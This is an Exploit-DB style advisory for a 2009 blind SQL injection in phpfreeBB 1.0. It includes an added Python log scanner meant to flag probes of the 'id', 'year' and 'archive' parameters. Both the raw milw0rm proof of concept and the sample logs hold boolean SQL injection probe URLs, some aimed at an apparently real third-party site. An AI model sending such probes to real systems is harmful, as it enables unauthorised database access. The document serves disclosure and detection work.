Vendor: phpfreebb
By: Moudi
CVSS: 7.5 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: phpfreebb
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpfreebb:phpfreebb:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

phpfreeBB 1.0 Remote BLIND SQL Injection Vulnerability

phpfreeBB 1.0 is vulnerable to Blind SQL Injection. The application fails to properly sanitize user-supplied input to the 'id' parameter of 'permalink.php' and the 'year'/'archive' parameters of 'index.php'. An attacker can exploit this to manipulate SQL queries by injecting arbitrary SQL code, which may allow access to or modification of sensitive data in the back-end database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
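
Since no patch exists, the same validation rule can also be run over web server logs to spot probing of the affected parameters. The following is an added example, not code from the advisory or from phpfreeBB: it assumes combined-format access logs and that 'id', 'archive' and 'year' are always plain integers in legitimate requests (as in the advisory's own URLs); the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters the advisory names as injectable.
# Assumption: legitimate values for all of them are plain integers.
WATCHED = {"permalink.php": ("id",), "index.php": ("archive", "year")}

# Request part of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return [(param, value)] for watched parameters whose value is not an integer."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    watched = WATCHED.get(script, ())
    hits = []
    # parse_qsl decodes '+' and %xx, so encoded payloads are checked in decoded form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched and not re.fullmatch(r"[0-9]{1,10}", value):
            hits.append((name, value))
    return hits

def scan(log_lines):
    """Return [(line_number, param, decoded_value)] for every flagged request."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((number, name, value))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Aug/2009:10:00:01 +0000] "GET /diary/permalink.php?id=9 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [18/Aug/2009:10:00:07 +0000] "GET /diary/permalink.php?id=9+and+1=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [18/Aug/2009:10:00:08 +0000] "GET /diary/permalink.php?id=9+and+1=2 HTTP/1.1" 200 812',
    '192.0.2.10 - - [18/Aug/2009:10:01:30 +0000] "GET /diary/index.php?archive=5&year=2008 HTTP/1.1" 200 7300',
    '192.0.2.44 - - [18/Aug/2009:10:02:02 +0000] "GET /diary/index.php?archive=5&year=2008%20and%201%3D2 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name}={value!r} is not an integer")
```

The same allow-list check (digits only, bounded length) is what the application itself should enforce on these parameters before they reach a query, ideally together with parameterized statements.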

Exploit-DB raw data:

/*

              _____       _ ___        __          
             | ____|_   _(_) \ \      / /_ _ _   _ 
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/ 
                                    _____                    
                                   |_   _|__  __ _ _ __ ___  
                                      | |/ _ \/ _` | '_ ` _ \ 
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

phpfreeBB 1.0 Remote BLIND SQL Injection Vulnerability

Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://prdownloads.sourceforge.net/phpfreebb/bb.zip?download
           http://phpfreebb.sourceforge.net/

Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: http://unkn0wn.ws/board/index.php

*/

[+] Exploit bSQL:

- Vulnerable code in permalink.php (id).
- Vulnerable code in index.php (year/archive).

- Poc:
  http://127.0.0.1/permalink.php?id=[bSQL]
  http://127.0.0.1/index.php?archive=[NB]&year=[bSQL]

  http://kumi.awardspace.com/diary/permalink.php?id=9+and+1=1 TRUE
  http://kumi.awardspace.com/diary/permalink.php?id=9+and+1=2 FALSE

  http://kumi.awardspace.com/diary/index.php?archive=5&year=2008+and+1=1 TRUE
  http://kumi.awardspace.com/diary/index.php?archive=5&year=2008+and+1=2 FALSE

# milw0rm.com [2009-08-18]